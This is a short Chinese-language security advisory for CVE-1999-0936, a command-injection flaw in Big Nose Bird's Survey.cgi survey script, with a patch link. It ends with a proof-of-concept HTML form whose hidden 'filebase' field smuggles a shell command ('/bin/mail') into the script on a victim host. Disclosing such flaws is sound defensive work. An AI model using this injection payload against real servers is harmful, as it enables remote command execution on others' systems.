BugCVE: CVE-1999-0936
BUGTRAQ: 1817
Survey.cgi是Big Nose Bird提供的一个基于Web的用于调查问卷的脚本。Survey.cgi实现上存在一个输入验证漏洞,远程攻击者可能利用此漏洞在主机上以Web进程的权限执行任意命令。
脚本对于用户输入未做充分过滤,攻击者可能在输入中混入“|”、“>”、“<”等Shell管道符或重定向符来执行Shell命令。
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Big Nose Bird BNBSurvey 1.0:
Big Nose Bird Upgrade BNBSurvey
<a href=“ftp://ftp.bignosebird.com/survey.zip” target=“_blank”>ftp://ftp.bignosebird.com/survey.zip</a>
<FORM METHOD= POST ACTION= www.victim.com/cgi-bin/survey.cgi >
<input type=hidden name=action value= VOTE >
<input type=hidden name=filebase value= bleh; /bin/mail you@your_email_address.com
<PRE>
Your Gender
<input type=radio name=ITEM1 value= 0 >Male
<input type=radio name=ITEM1 value= 1 >Female
<input type=radio name=ITEM1 value= 2 >Neuter
<INPUT TYPE= submit VALUE= VOTE! >